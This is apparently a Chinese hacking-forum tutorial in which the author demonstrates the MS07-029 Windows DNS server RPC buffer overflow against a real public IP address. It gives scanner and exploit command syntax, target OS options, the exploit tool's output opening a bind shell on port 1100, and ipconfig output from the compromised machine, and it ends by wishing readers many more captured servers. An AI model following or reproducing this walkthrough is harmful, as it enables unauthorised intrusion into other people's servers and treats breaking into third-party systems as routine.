|
大家好我是nzdpig我的QQ是85383545大菜鸟一个,今天演示下ms07-029溢出,高手过。。。。
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理 接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的 所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
目标是 219.130.137.170 由于时间关系我事先已经找好了。
工具到处有的下,
用扫描器扫53端口,再用DNS EXP 扫,
格式,漏洞扫描:dns -s 0.0.0.0
溢出:dns -t 参数 0.0.0.0 端口
name : des cription 2000all : Windows 2000 +SP4 2003eng : EN Windows 2003 Std Ed +SP1 2003chs : CN Windows 2003 Std Ed +SP1 2003cht : TW Windows 2003 Std Ed +SP1 2003jpn : JP Windows 2003 Std Ed +SP1 2003kor : KR Windows 2003 Std Ed +SP1
下面看演示 1025 1026 1026 1027 1573 219.130.137.170 1573 :Vulnerability OS:window 2000
端口1573 2000系统
下面溢出 :\>dns -t 2000all 219.130.137.170 1573 .] - UnQuoteIt 006 RC1 - ENJOY - DRIVE WITH CAUTION- Anti-dep version *] - bind shell payload selected (317 bytes) port:1100 addr:0.0.0.0 *] - Connection to target host tcp port established *] - Successfully bound to the vulnerable DCERPC interface *] - OS fingerprint result: Windows 2000 *] - Attack sent, check port 1100 成功了 我们来TELNET 1100
Windows 2000 IP Configuration
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 219.130.137.170 Subnet Mask . . . . . . . . . . . : 255.255.252.0 Default Gateway . . . . . . . . . : 219.130.137.169
时间关系我就不继续下去了,祝大家拿多点服务器。 |